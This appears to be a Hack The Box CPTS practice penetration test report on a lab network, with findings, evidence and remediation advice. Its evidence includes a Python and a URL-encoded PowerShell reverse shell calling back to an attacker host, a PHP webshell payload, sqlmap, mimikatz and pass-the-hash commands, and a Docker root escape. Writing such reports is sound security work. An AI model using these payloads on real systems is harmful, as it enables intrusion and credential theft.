CONFIDENTIAL HTB CPTS 27

 HACKTHEBOX

|_clock-skew: 2h40m41s |
smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required

Read data files from: /usr/bin/../share/nmap

Service detection performed. Please report any incorrect results at https://nmap.org/ submit/ . # Nmap done at Thu
Jun 13 02:42:28 2024 -- 1 IP address (1 host up) scanned in 96.63 seconds

The testerreviously found the encrypted password IPMI from the DC02the directory

s
m
xa
re
be
cy
e/

Figure 17 - Documents Folder

.m

The encrypted Password

//t
s:
tp
ht

Figure 18 - IPMI CREDS

tester is able to decrypt it using powershell

*Evil-WinRM* PS C:\Users\Administrator\Documents> copy svc_ipmi.Cred credential.xml

*Evil-WinRM* PS C:\Users\Administrator\Documents> ls

Directory: C:\Users\Administrator\Documents

Mode LastWriteTime Length Name

---- ------------- ------ ----
d----- 7/26/2022 7:09 AM PSTrueCrypt d----- 8/22/2022 10:52 AM
WindowsPowerShell -a---- 7/26/2022 7:09 AM 19561 automssqlbackup.ps1
-a---- 8/18/2022 4:00 AM 1438 credential.xml
-a---- 8/18/2022 3:57 AM 2714 Fan Control.ps1

CONFIDENTIAL HTB CPTS 28

 HACKTHEBOX

-a---- 6/13/2024 6:39 AM 11849245 LaZagne.exe

-a---- 7/26/2022 7:10 AM 2326 nas_ipmi_turn_on_map_drives.vbs
-a---- 7/26/2022 7:10 AM 11178 PSTimeMachine.ps1
-a---- 7/26/2022 7:10 AM 7609 Set-iLOIPMI.ps1
-a---- 8/18/2022 4:00 AM 1438 svc_ipmi.Cred

*Evil-WinRM* PS C:\Users\Administrator\Documents> $credential = Import-Clixml -Path "credenti al.xml"

*Evil-WinRM* PS C:\Users\Administrator\Documents> $password = $credential.GetNetworkCredentia l().Password
*Evil-WinRM* PS C:\Users\Administrator\Documents> $password [[ REDACTED PASSWORD ]] with

this password tester logged in to the admin panel of http://172.16.210.21:8080/

s
m
xa
re
be
cy

now tester want to add ADMIN01 moniotr and Add new action in this alert for the external proccess and
e/

set all variables and save it.

.m

Exec.name: cmd.exe
Directory: C:\Windows\System32
//t

Startup Dir: C:\Windows\System32

s:
tp
ht

CONFIDENTIAL HTB CPTS 29

 HACKTHEBOX

s
m
xa
re
be

then the tester run 'Force Test', select the monitor and in exec params change admin password
cy

/c "net user administrator [[ REDACTED ]]"

e/
.m
//t
s:
tp
ht

Now the tester can with a new password for administraor Log in to ADMIN01

CONFIDENTIAL HTB CPTS 30

 HACKTHEBOX

evil-winrm -i 172.16.210.21 -u administrator -p [[ REDACTED ]]

s
m
xa
re
be
cy
e/
.m
//t
s:
tp
ht

CONFIDENTIAL HTB CPTS 31

 HACKTHEBOX

6 Remediation Summary
As a result of this assessment there are several opportunities for Acme’s to strengthen its internal
network security. Remediation efforts are prioritized below starting with those that will likely take the
least amount of time and effort to complete. Acme’s should ensure that all remediation steps and
mitigating controls are carefully planned and tested to prevent any service disruptions or loss of data.

6.1 Short Term

SHORT TERM REMEDIATION:

• Set strong (24+ character) passwords on all SPN accounts *Enforce a password change for all
users because of the domain compromise • give emplyees awareness

6.2 Medium Term

s
MEDIUM TERM REMEDIATION:

m
• Disable LLMNR and NBT-NS wherever possible

xa
• Setup MDR and EDR
• update all application
re
• restict access of malicious ip
be

6.3 Long Term

cy

LONG TERM REMEDIATION:

e/

• Perform ongoing internal network vulnerability assessments and domain password audits
.m

• Perform periodic Active Directory security assessments

• Educate systems and network administrators and developers on security hardening best practices
//t

compromise
s:

• Enhance network segmentation to isolate critical hosts and limit the effects of an internal
tp

compromise

7 Technical Findings Details

ht

1. Remote Code Execution (RCE) - Critical

CWE CWE-434: Unrestricted Upload of File with Dangerous Type

CVSS 3.1 9.0 / CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

The web application is vulnerable to Unrestricted Upload of File with Dangerous

Root Cause Type and SQLi from this a malicious user can restive the actual path of the File
uploaded and execute commands on the server
The impact of unrestricted file uploads and SQL injection includes unauthorized
Impact code execution, data breaches, server compromise, data loss, service disruption,
and potential legal and reputational damage to the organization.

CONFIDENTIAL HTB CPTS 32

 HACKTHEBOX

Affected http://securetransfer-dev.trilocor.local/storage/2_31159b[ SNIP ]d84.php?

Component cmd=[command here]

To mitigate risks from unrestricted file uploads and SQL injection, enforce file type
validation, size limits, name sanitization, secure storage, proper permissions,
Remediation
parameterized queries, input validation, least privilege access, error handling, and
regular security audits.
References -

Finding Evidence
Malicious User has uploaded web shell on the server and able get web revershell using the blow payload

1. Malicious user can register user on the http://securetransfer-dev.trilocor.local and log in the
dashboard

s
m
xa
re
be
cy
e/
.m

2. User is able to upload any file they want to upload there is no restriction for the file type or the
content
//t
s:
tp
ht

3. Malicious user can chain the SQli vulnerability here and file the actual path of the file

sqlmap -r download.txt --dbms=mysql --dbs -D securetransfer -T files -C real_path --dump

sqlmap ___
__H__
___ ___[,]_____ ___ ___ {1.8.5#stable}

CONFIDENTIAL HTB CPTS 33

 HACKTHEBOX

|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[[SNIP]]....
[20:29:47] [INFO] resumed: /var/www/html/storage/2_31159bec-1565-427b-a168-f25dc34a7d84.php
Database: securetransfer
Table: files
[1 entry]
+------------------------------------------------------------------+
| real_path |
+------------------------------------------------------------------+
| /var/www/html/storage/2_31159bec-[[ REDACTED ]]4a7d84.php |
+------------------------------------------------------------------+

[20:29:47] [INFO] table 'securetransfer.files' dumped to CSV file ' [[SNIP]]...

3. Malicious user can access path and try to check the for the command injection using the blow

s
payloads

m
?cmd=whoami;id

xa
re
be
cy
e/
.m

4. attacker is able to get a revers shell a payload and get a shell

//t
s:
tp
ht

CONFIDENTIAL HTB CPTS 34

 HACKTHEBOX

2. SQL Injection (SQLi) - High

CWE-89: Improper Neutralization of Special Elements used in an SQL Command
CWE
('SQL Injection')

CVSS 3.1 8.8 / CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

The web application processed user input in an insecure manner and was thus
vulnerable to SQL injection. In an SQL injection attack, special input values in the
web application are used to influence the application's SQL statements to its
Root Cause database. Depending on the database used and the design of the application, this
may make it possible to read and modify the data stored in the database, perform
administrative actions (e.g., shut down the DBMS), or in some cases even gain code
execution and the accompanying complete control over the vulnerable server.
The impact of SQL injection can range from unauthorized access to sensitive data,
manipulation or deletion of database records, escalation of privileges, complete

s
Impact system compromise, service disruption, theft of intellectual property, and significant

m
damage to the organization's reputation and financial losses due to legal
repercussions and loss of customer trust.

xa
Affected
http://securetransfer-dev.trilocor.local/download.php?file=*
Component
re
be
• Use prepared statements throughout the application to effectively avoid SQL
injection vulnerabilities. Prepared statements are parameterized statements
cy

and ensure that even if input values are manipulated, an attacker is unable to
change the original intent of an SQL statement.
e/

• Use existing stored procedures by default where possible. Typically, stored

procedures are implemented as secure parameterized queries and thus protect
.m

against SQL injections.

Remediation • Always validate all user input. Ensure that only input that is expected and valid
//t

for the application is accepted. You should not sanitize potentially malicious
s:

input.
• To reduce the potential damage of a successful SQL Injection attack, you should
tp

minimize the assigned privileges of the database user used according to the
ht

principle of least privilege.

• For detailed information and assistance on how to prevent SQL Injection
vulnerabilities, see OWASP's linked SQL Injection Prevention Cheat Sheet.

References https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

Finding Evidence
We identified an SQL injection vulnerability in the web application and were able to access stored data
in the database as a result.

TODO: technical description

SQL Injection is a common server-side vulnerability in web applications. It occurs when software
developers create dynamic database queries that contain user input. In an attack, user input is crafted
in such a way that the originally intended action of an SQL statement is changed. SQL injection
vulnerabilities result from an application's failure to dynamically create database queries insecurely and
to properly validate user input. They are based on the fact that the SQL language basically does not

CONFIDENTIAL HTB CPTS 35

 HACKTHEBOX

distinguish between control characters and data characters. In order to use a control character in the
data part of an SQL statement, it must be encoded or escaped appropriately beforehand.

An SQL injection attack is therefore essentially carried out by inserting a control character such as '
(single apostrophe) into the user input to place new commands that were not present in the original
SQL statement. A simple example will demonstrate this process. The following SELECT statement
contains a variable userId. The purpose of this statement is to get data of a user with a specific user id
from the Users table. sqlStmnt = 'SELECT * FROM Users WHERE UserId = ' + userId;

An attacker could now use special user input to change the original intent of the SQL statement. For
example, he could use the string ' or 1=1 as user input. In this case, the application would construct the
following SQL statement: sqlStmnt = 'SELECT * FROM Users WHERE UserId = ' + ' or 1=1;

Instead of the data of a user with a specific user ID, the data of all users in the table is now returned to
the attacker after executing the statement. This gives an attacker the ability to control the SQL statement
in his own favor.

s
There are a number of variants of SQL injection vulnerabilities, attacks and techniques that occur in

m
different situations and depending on the database system used. However, what they all have in

xa
common is that, as in the example above, user input is always used to dynamically construct SQL
statements. Successful SQL injection attacks can have far-reaching consequences. One would be the
re
loss of confidentiality and integrity of the stored data. Attackers could gain read and possibly write
access to sensitive data in the database. SQL injection could also compromise the authentication and
be
authorization of the web application, allowing attackers to bypass existing access controls. In some
cases, SQL injection can also be used to gain code execution, allowing an attacker to gain complete
cy

control over the vulnerable server.

e/

3. Account takeover - High

.m

CWE CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

CVSS 3.1 8.5 / CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

//t
s:

Through RCE, an attacker can access files saved inside the server, including the
database username and password, and the database configuration file. From there,
tp

the attacker can obtain data from a new application at http://

Root Cause
ht

osticketapp.trilocor.local. Additionally, the attacker can retrieve the hashes of

encrypted usernames and passwords. all this lead to discover a new another domain
http://gogsusdev01.trilocor.local
The impact of the vulnerability is severe, as it allows an attacker to gain
administrative access to the web application by exploiting weak password hashes
Impact obtained from the Docker configuration file. This enables the attacker to take over
accounts, potentially compromising sensitive data, altering application settings, and
executing unauthorized actions within the system.
Affected
http://osticketapp.trilocor.local
Component

To mitigate account takeover via RCE, secure configuration files, use strong
password hashing, enforce access controls, conduct regular audits, update
Remediation
software, monitor logs, segregate environments, and implement multi-factor
authentication (MFA).

CONFIDENTIAL HTB CPTS 36

 HACKTHEBOX

References -

Finding Evidence
1. From the internal recon we discovered a README file got a new subdomain http://
osticketapp.trilocor.local

s
m
xa
2. from the same location, I have discovered few username and admin email
user : Administrator hash :
re
$2a$08$UPdUiJSf37r.gC7TUnOLQOY4HTTLms7G.dUAPDTXKpI2QiQKyH88. mail :
be
admin@trilocor.local

[[SNIP]]
cy

/*!40000 ALTER TABLE òst_staff`DISABLE KEYS */;

INSERT INTO òst_staff`VALUES
e/

(1,1,1,'Administrator','Administrator','Administrator','$2a$08$UPdUiJSf37r.gC7TUnOLQOY4HTTLms
.m

7G.dUAPDTXKpI2QiQKyH88.',NULL,'admin@trilocor.local','',NULL,'','',NULL,NULL,NULL,NU
LL,1,1,1,0,0,0,0,25,0,'none','Letter',NULL,'{\"user.create\":1,\"user.delete\":
1,\"user.edit\":1,\"user.manage\":1,
//t

UNLOCK TABLES;
[[SNIP]]
s:
tp

3. the hash is bcrypt encrypted, is it crakable using hashcat

ht

╭─kali@kali ~/Desktop/CPTS/
hash
╰─$ hashcat -m 3200 os-ticket.txt ~/Tools/wordlist/
rockyou.txt

hashcat (v6.2.6) starting [[SNIP]].....

$2a$08$UPdUiJSf37r.gC7TUnOLQOY4HTTLms7G.dUAPDTXKpI2QiQKyH88.:administracion

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish
(Unix)) Hash.Target......:
$2a$08$UPdUiJSf37r.gC7TUnOLQOY4HTTLms7G.dUAPDTXKpI2...KyH88.

Time.Started.....: Thu Jun 6 21:00:53 2024 (1 min, 34 secs)

[[SNIP]].....

CONFIDENTIAL HTB CPTS 37

 HACKTHEBOX

4. able to log in to the application and find the new subdomain http://gogsusdev01.trilocor.local

s
m
xa
re
be
cy
e/
.m
//t
s:
tp
ht

4. Privilege Escalation On API - High

CWE CWE-284: Improper Access ControlWeakness ID: 284

CVSS 3.1 7.5 / CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

The vulnerability in question allows a normal user to escalate their privileges to that
of an admin user through the API's update function. This type of vulnerability can
Root Cause have severe consequences as it enables unauthorized users to perform actions that
should be restricted to administrators, such as accessing sensitive data, modifying
critical system settings, or managing other users.

CONFIDENTIAL HTB CPTS 38

 HACKTHEBOX

• Unauthorized Access: Attackers can gain unauthorized access to admin-level

functions, leading to potential data breaches and exposure of sensitive
information.
• Data Integrity Issues: Malicious users can modify or delete critical data,
compromising the integrity and reliability of the system.
Impact • Service Disruption: Unauthorized changes to system settings or user roles can
disrupt the normal operation of the service, leading to downtime or degraded
performance.
• Compliance Violations: Exploitation of this vulnerability can result in violations
of data protection regulations and standards, potentially leading to legal and
financial repercussions.
Affected
http://uat01-eu.intranet.trilocor.local
Component

To mitigate privilege escalation, secure repository access, validate API inputs,

enforce strong authentication and authorization, follow the least privilege principle,

s
Remediation implement comprehensive logging and auditing, conduct regular security reviews,

m
apply rate limiting and monitoring, and ensure user roles cannot be modified

xa
through user-controlled inputs.
References - re
Finding Evidence
be

1. Malicious create an account on http://uat01-eu.intranet.trilocor.local

2. While checking the repositories we can discover a repository of administrator user
cy

3. from the repository, it discloses information about API applications working

e/
.m
//t
s:
tp
ht

4. Register the user on the application. On update profile API the malicious user can add additional
parameter role change to admin

CONFIDENTIAL HTB CPTS 39

 HACKTHEBOX

5. this lead to a normal user to privilege escalate to admin user

5. Remote Code Execution (RCE) On API - Critical

CWE TODO CWE

s
m
CVSS 3.1 9.0 / CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

xa
The vulnerability allows an attacker to execute arbitrary PHP code through the
Support Ticket API by injecting a payload in the ticket creation process. This enables
re
Root Cause
unauthorized access to sensitive files on the server, potentially leading to further
be
exploitation such as deploying a reverse shell.
Unauthorized Code Execution: Attackers can execute arbitrary PHP code on the
cy

Impact server, leading to data breaches, service disruptions, and unauthorized access to
system resources.
e/

Affected
.m

http://gogsusdev01.trilocor.local
Component
//t

Input Validation: Implement strict input validation and sanitization to prevent

Remediation
injection attacks.
s:

References -
tp

Finding Evidence
ht

On the add Support ticket API we can create a data with our payload

< ?=$̀_GET[0]`
? >

we can see the ticket with support API

CONFIDENTIAL HTB CPTS 40

 HACKTHEBOX

go to the export ticket on parameter add on .php and send the request

s
m
xa
re
be
cy

now malicious user can access the PHP file we exported

e/
.m
//t
s:
tp
ht

Now we can take a revershell on attacker machine machine

CONFIDENTIAL HTB CPTS 41

 HACKTHEBOX

s
m
xa
re
be
cy
e/
.m
//t
s:
tp
ht

CONFIDENTIAL HTB CPTS 42

 HACKTHEBOX

6. Werkzeug console RCE via WEBSVC to SRVADM - High

CWE TODO CWE

CVSS 3.1 7.5 / CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

The vulnerability involves exploiting the Werkzeug console to achieve Remote Code
Execution (RCE) on a Linux system. This can subsequently lead to privilege
Root Cause
escalation from a web service user to a system administrator (srvadm), granting
unauthorized access and control over the server.
• Remote Code Execution (RCE): Allows attackers to execute commands on the
server remotely, potentially compromising data integrity, confidentiality, and
availability.
Impact
• Privilege Escalation: Elevates attacker privileges from a lower-level web service
user to a higher-level system administrator, enabling broader access to
sensitive system resources.

s
Affected

m
WEB-NIX01 | http://trilocor.local:7777/console
Component

xa
• Update and Patch: Apply security updates promptly to mitigate known
vulnerabilities in Werkzeug and other software components.
re
• Access Control: Implement strict access controls and segregation of privileges
Remediation to limit the impact of potential RCE attacks.
be
• Monitoring and Logging: Establish comprehensive monitoring and logging
mechanisms to detect suspicious activities and potential RCE attempts early.
cy

References https://book.hacktricks.xyz/network-services-pentesting/pentesting-
e/

web/werkzeug
.m

Finding Evidence
Login to websrv user to machine and check the process running as srvadm, malicious user can see the
//t

budget calculator application running as srvadm

s:
tp
ht

we already know that in http://trilocor.local:7777/console Werkzeug is running , Now attacker is able to

create an exploit using https://book.hacktricks.xyz

CONFIDENTIAL HTB CPTS 43

 HACKTHEBOX

s
m
xa
re
be

running this exploit will give the password for the console
cy
e/
.m
//t
s:
tp
ht

Now attacker can use this payload to get the rce

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<<
ATTACKER IP >>",<<ATTACKER PORT >>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),
1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash"

CONFIDENTIAL HTB CPTS 44

 HACKTHEBOX

we will receive a reverse shell srvadm user

s
m
xa
re
be
cy
e/
.m
//t
s:

7. Docker Privilage escalation SRVADM to ROOT - High

tp

CWE CWE-250: Execution with Unnecessary Privileges

ht

CVSS 3.1 8.8 / CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

The user srvadm has been granted access to the Docker daemon through
membership in the Docker group. This configuration allows srvadm to execute
Root Cause
Docker commands, including running containers with privileged access to the host
system.
Privileged Container Execution: Using the Docker command provided (docker -H
unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu:20.04 chroot /mnt bash),
srvadm can launch a Docker container with the ability to access and modify the host
Impact
filesystem. Potential Security Risks: Granting Docker access to a user with
administrative privileges (srvadm) increases the risk of unauthorized system
modifications, data breaches, and potential compromise of sensitive information.
Affected
WEB-NIX01
Component

CONFIDENTIAL HTB CPTS 45

 HACKTHEBOX

• Least Privilege Principle: Restrict Docker access to only those users who
absolutely require it for their tasks.
• Container Security Best Practices: Implement Docker security best practices,
Remediation such as using minimal images, applying least privilege principles within
containers, and regularly updating Docker images.
• Monitor Docker Activities: Continuously monitor Docker activities and container
deployments for any suspicious or unauthorized actions.

https://book.hacktricks.xyz/linux-hardening/privilege-
References
escalation/interestinggroups-linux-pe#docker-group

Finding Evidence
The user srvadm is logged in with the docker group. This allows him to use and control the Docker
daemon.

s
m
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu:20.04 chroot /mnt bash

xa
8. Master Password Disclosure Via NFS share - Critical re
CWE CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
be
CVSS 3.1 9.3 / CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
cy

The attacker has identified an open mount point, allowing unauthorized access to
Root Cause sensitive files. Subsequently, they were able to discover the master password for the
e/

GlassFish server, potentially compromising its security.

.m

• Unauthorized Access: The discovery of an open mount point indicates a

significant security oversight, potentially exposing critical system files to
//t

unauthorized users.
Impact
• Master Password Compromise: Obtaining the master password for the
s:

GlassFish server poses a severe security risk, allowing the attacker to gain full
tp

administrative control over the server and its associated resources.

ht

Affected
172.16.139.35
Component

• Secure Configuration: Ensure all mount points are properly secured and access
is restricted based on the principle of least privilege.
• Access Controls: Implement robust access controls and authentication
mechanisms to prevent unauthorized access to sensitive files and resources.
Remediation • Encryption: Encrypt sensitive information such as passwords to mitigate the
impact of unauthorized access.
• Regular Audits: Conduct regular security audits and vulnerability assessments
to identify and remediate potential security weaknesses before they can be
exploited.
References -

Finding Evidence
Attacker Discovered open mount

CONFIDENTIAL HTB CPTS 46

 HACKTHEBOX

attacker is able to discover master password for glassfish sever

9. GlassFish server RCE - High

s
CWE CWE-94: Improper Control of Generation of Code ('Code Injection')

m
CVSS 3.1 8.4 / CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

xa
A Remote Code Execution (RCE) vulnerability in GlassFish server allows attackers to
re
Root Cause
execute arbitrary code on the server, leading to severe security risks.
be
1. Complete Server Compromise: Full control over the server.
Impact
2. Data Breach: Unauthorized access to sensitive data.
cy

Remediation Update GlassFish server to the latest version.

e/

References -
.m

Finding Evidence
//t

• from the previous RCE attacker is able to do tunneling using ligolo-ng and started internal
enumeration.
s:
tp
ht

• Login as administrator on glass fish server with master password we found from the open mount

CONFIDENTIAL HTB CPTS 47

 HACKTHEBOX

s
m
• Administrator user can deploy pages, a malicious user can upload web shell using this functionality

xa
• Download a web shell and zip the file
zip -r cmd.war cmd.jsp re
• Now attacker can upload the file to the glass fish server
be
cy
e/
.m
//t
s:
tp
ht

• Deploy and launch the file

• Then attacker can go to the file path and access the web shell from there

• Now we can get take a reverse shell from here

172.16.139.35:8080/cmd/cmd.jsp?cmd=powershell+-nop+-c+"%24client+%3D+New-
Object+System.Net.Sockets.TCPClient('172.16.139.10'%2C443)%3B%24stream+%3D+

CONFIDENTIAL HTB CPTS 48

 HACKTHEBOX

%24client.GetStream()%3B[byte[]]%24bytes+%3D+0..65535|%25{0}%3Bwhile((%24i+%3D+
%24stream.Read(%24bytes%2C+0%2C+%24bytes.Length))+-ne+0){%3B%24data+%3D+(New-Object+-
TypeName+System.Text.ASCIIEncoding).GetString(%24bytes%2C0%2C+%24i)%3B%24sendback+%3D+(iex+
%24data+2>%261+|+Out-String+)%3B%24sendback2+%3D+%24sendback+%2B+'PS+'+%2B+(pwd).Path+
%2B+'>+'%3B%24sendbyte+%3D+([text.encoding]
%3A%3AASCII).GetBytes(%24sendback2)%3B%24stream.Write(%24sendbyte%2C0%2C%24sendbyte.Length)
%3B%24stream.Flush()}%3B%24client.Close()"

s
m
xa
re
be
cy
e/
.m
//t
s:
tp
ht

CONFIDENTIAL HTB CPTS 49

 HACKTHEBOX

10. Privilege Escalation via SeLoadDriverPrivilege Enabled -

High
CWE CWE-250: Execution with Unnecessary Privileges

CVSS 3.1 7.5 / CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

SeLoadDriverPrivilege is a Windows security privilege that allows a user to load and

unload device drivers. Device drivers run at a high privilege level (kernel mode),
Root Cause
which means that anyone with the ability to load a driver could potentially execute
code with elevated privileges.
• Privilege Escalation: Attackers can exploit SeLoadDriverPrivilege to load a malicious
driver, thereby gaining kernel-level access to the system. This can lead to
Impact complete system compromise, allowing attackers to execute arbitrary code with
the highest privileges.
• Attacker can privilege Escalate to the Administrator user

s
m
• Assign SeLoadDriverPrivilege only to trusted administrative accounts and
services that require it. Avoid granting this privilege to standard user accounts.

xa
Remediation • Implement Group Policy settings to restrict which accounts can load and
unload drivers. Regularly review and update these policies to ensure they
re
adhere to the principle of least privilege.
be
References -

Finding Evidence
cy

SeDebugPrivilege is enabled on the server.

e/
.m
//t
s:
tp
ht

This attacker has permission to migrate the process. The attacker can obtain a session on Metasploit
and use the migrate module to escalate privileges.

CONFIDENTIAL HTB CPTS 50

 HACKTHEBOX

That an attacker can get the administrative shell by migrating the process.

s
m
xa
re
be
cy
e/
.m
//t
s:
tp
ht

CONFIDENTIAL HTB CPTS 51

 HACKTHEBOX

11. SeDebugPrivilege Enabled - High

CWE CWE-269: Improper Privilege Management

CVSS 3.1 7.8 / CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

The vulnerability stemming from enabling SeDebugPrivilege (Debug programs

privilege) lies in its potential for privilege escalation if improperly managed. This
Root Cause privilege allows users to attach a debugger to any process on the system, which can
be exploited by attackers to gain unauthorized access or manipulate processes.

The primary risk associated with SeDebugPrivilege is privilege escalation. By

enabling this privilege, users can gain access to and manipulate processes running
Impact
with higher privileges than their own. This can lead to complete compromise of the
system if exploited by an attacker.
• Minimize Privilege Use: Ensure that SeDebugPrivilege is only assigned to

s
accounts and services that absolutely require it for legitimate purposes. Avoid

m
assigning it to standard user accounts.
Remediation
• Restrict Access: Limit the assignment of SeDebugPrivilege to specific

xa
administrative accounts and system services that require it. Regular audits
re
should verify this access control.
References -
be

Finding Evidence
cy

Attacker can use mimikatz and dump the hash

e/

.\mimikatz.exe privilege::debug lsadump::sam exit

.m

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
//t

## / \ ## /*** Benjamin DELPY g̀entilkiwi`( benjamin@gentilkiwi.com )

## \ / ## > https://blog.gentilkiwi.com/mimikatz
s:

'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' >

tp

https://pingcastle.com / https://mysmartlogon.com ***/

ht

mimikatz(commandline) # privilege::debug Privilege '20' OK

mimikatz(commandline) # lsadump::sam
Domain : MS01
SysKey : 90557b78f23225c40937c0791ad38df6
Local SID : S-1-5-21-4027693121-2049782792-260753726 SAMKey :

d9cec4e96dbd975f8f1a35c1afbcbdee

RID : 000001f4 (500)

User : Administrator
Hash NTLM: b3a92ef[[ ]]7d7fd89

[[ SNIP ]]
mimikatz(commandline) # exit
Bye!

C:\Users\Public>

CONFIDENTIAL HTB CPTS 52

 HACKTHEBOX

This led to Privilege Escalate to the Administrator user and the attacker can log in using the hash

s
m
xa
re
be
cy

The user has a restriction on their account for RDP login. This restriction can be bypassed by disabling
e/

it through an evilwinrm login.

.m
//t
s:
tp

xfreerdp /v:172.16.139.35 /u:administrator /pth:'b3a92e[[ SNIP ]]7fd89' /cert:ignore /size:

80 %
ht

CONFIDENTIAL HTB CPTS 53

 HACKTHEBOX

s
m
xa
re
be
cy
e/
.m
//t
s:
tp
ht

CONFIDENTIAL HTB CPTS 54

 HACKTHEBOX

12. Privilaege escalation via Login session Hijacking - High

CWE CWE-287: Improper Authentication

CVSS 3.1 7.5 / CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Login Session Hijacking is a technique where an attacker gains control over another
user's session, potentially escalating their privileges. In this scenario, the attacker
Root Cause
(with administrative privileges) hijacks the session of another user logged into the
system.
• By hijacking the session of pthorp_adm, you can potentially access resources
and data that are accessible to this user but not to the original administrative
Impact account.
• The ability to interact with another user’s session can lead to unauthorized
access to sensitive information, applications, or network resources.

Regularly audit and monitor user sessions using tools like query user and

s
Remediation centralized logging solutions. Look for anomalies such as unexpected user logins or

m
the creation of new services.

xa
References -

Finding Evidence
re
The query user command is used to list all users currently logged into the system. This reveals the
be
presence of the pthorp_adm user session.
cy
e/
.m
//t
s:
tp

Using administrative privileges, you create a new service that executes a payload, potentially granting
ht

access to the pthorp_adm session or running code under this user's context.

running net start <servicename> will give the session of pthorp_adm

CONFIDENTIAL HTB CPTS 55

 HACKTHEBOX

s
m
xa
re
be
cy

but this is asking for the password, so we can change the password of this user using administrator
e/

privileges
.m
//t
s:
tp
ht

with new password we can log in as pthorp_adm

CONFIDENTIAL HTB CPTS 56

 HACKTHEBOX

s
m
xa
re
be
cy
e/
.m
//t
s:
tp
ht

CONFIDENTIAL HTB CPTS 57

 HACKTHEBOX

13. Account Takeover via Plain Text Credentials on Sticky

Notes - High
CWE TODO CWE

CVSS 3.1 7.5 / CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

An attacker gains unauthorized access to an account by finding plain text credentials

written on sticky notes. This scenario highlights a common but often overlooked
Root Cause
security vulnerability where users write down their passwords or other sensitive
information and leave them in easily accessible locations.
1. Unauthorized Access:

The attacker can gain unauthorized access to user accounts, potentially including
those with active Directory privileged access.
2. Data Breach:

s
Once inside the system, the attacker can access sensitive data, leading to

m
Impact
potential data breaches that can compromise personal information, intellectual

xa
property, or other confidential information.
3. Privilege Escalation: re
If the attacker gains access to a low-privilege account, they may attempt further
be
exploits to escalate privileges within the system.

egularly educate and train users on the importance of secure password practices,
cy

Remediation emphasizing the risks of writing down passwords and leaving them in accessible
e/

places.
References -
.m

Finding Evidence
//t

Login into pthorp_adm we can see the Sticky Notes in desktop

s:
tp
ht

CONFIDENTIAL HTB CPTS 58

 HACKTHEBOX

attacker login to the machine with this credentials

s
m
xa
re
14. Wondershare Dr.Fone 12.0.7 - Privilege Escalation
be

(ElevationService) - High
cy

CWE CVE : 2021-44595

e/

CVSS 3.1 8.8 / CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

.m

An attacker exploits a known vulnerability in an old version of the Wondershare

Dr.Fone application , which contains a privilege escalation flaw in its
//t

Root Cause
ElevationService. This allows the attacker to escalate their privileges to an
s:

administrative user on the system.

tp

The attacker gains administrative privileges, providing them with complete control
Impact
over the affected system.
ht

Regularly update all software applications to their latest versions. Ensure that
Remediation Wondershare Dr.Fone and similar applications are updated to versions that have
patched known vulnerabilities.
References -

Finding Evidence
Login to the server using

CONFIDENTIAL HTB CPTS 59

 HACKTHEBOX

s
m
xa
re
in Desktop, we have seen some application and the Wondershare is running old version and vulnerable
be
cy
e/
.m
//t
s:
tp
ht

share the exploit to the victim machine and run the exploit with python

this give as a shell on our net cat listener

CONFIDENTIAL HTB CPTS 60

 HACKTHEBOX

s
m
15. zone transfering - Info

xa
CWE CWE-402: Transmission of Private Resources into a New Sphere ('Resource Leak')
re
CVSS 3.1 0.0 / CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
be
DNS zone transfers replicate DNS records from primary to secondary servers for
Root Cause redundancy. Improper configurations can lead to unauthorized zone transfers,
cy

exposing sensitive network information like subdomains.

e/

Impact Discovered subdomains

.m

AXFR offers no authentication, so any client can ask a DNS server for a copy of the
entire zone. This means that unless some kind of protection is introduced, an
Remediation
//t

attacker can get a list of all hosts for a domain, which gives them a lot of potential
attack vectors.
s:

References -
tp
ht

CONFIDENTIAL HTB CPTS 61

 HACKTHEBOX

Finding Evidence
tester run the command

dig axfr trilocor.local <ip>

s
m
A Appendix xa
re
be

A.1 Finding Severities

cy

Each finding has been assigned a severity rating of critical, high, medium, low or info. The rating is based
off of an assessment of the priority with which each finding should be viewed and the potential impact
e/

each has on the confidentiality, integrity, and availability of Acme’s data.

.m

Rating CVSS Score Range

Critical 9.0 – 10.0
//t

High 7.0 – 8.9

s:

Medium 4.0 – 6.9

tp

Low 0.1 – 3.9

ht

Info 0.0

CONFIDENTIAL HTB CPTS 62

 HACKTHEBOX

A.2 Host & Service Discovery

IP Address Port Service Notes
10.129.191.44 80,7777 wordpress,Werkzeug

172.16.139.10 80,7777
